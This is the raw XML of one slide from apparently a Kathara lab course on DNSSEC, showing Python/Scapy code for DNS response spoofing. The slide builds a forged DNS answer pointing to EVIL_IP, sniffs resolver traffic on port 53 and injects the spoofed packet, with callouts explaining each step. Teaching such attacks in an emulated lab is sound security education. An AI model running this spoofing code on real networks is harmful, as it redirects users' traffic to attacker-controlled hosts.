                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=600, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=EVIL_IP)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>spoofed_pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>spoofed_pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, verbose=False)            </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    sniff(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, filter=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>f"udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> port 53 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> {DNS_UNI_IP}", </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>prn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, store=0)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>except</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>KeyboardInterrupt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>print</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>("\n[*] Attack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stopped</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> by user.")</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA1ACB8-5DBD-0442-77D7-DCB88B7D71E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B8C8D0-7DAD-C7F3-C40E-9E6CA5A05C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533524" y="116632"/>
            <a:ext cx="10048875" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1180C5C4-3829-5FAF-74F1-0805541B2A55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FCEBFF9-9EA4-B1ED-605B-7DD69E076EAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7E03FD7-795A-EC79-6FE6-2B44034347F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5945374" y="1429205"/>
            <a:ext cx="3271550" cy="447256"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -114100"/>
              <a:gd name="adj2" fmla="val 92939"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set the package as response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69731B26-2F30-C896-27A9-4CD025715F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6343161" y="2027795"/>
            <a:ext cx="3271550" cy="447256"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -124264"/>
              <a:gd name="adj2" fmla="val 23905"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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it-IT">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>authoritative answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F9B265-991C-56D1-86FD-4BD48F62EDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="66594" y="1909973"/>
            <a:ext cx="2510695" cy="702598"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70177"/>
              <a:gd name="adj2" fmla="val 106190"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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it-IT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>original</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
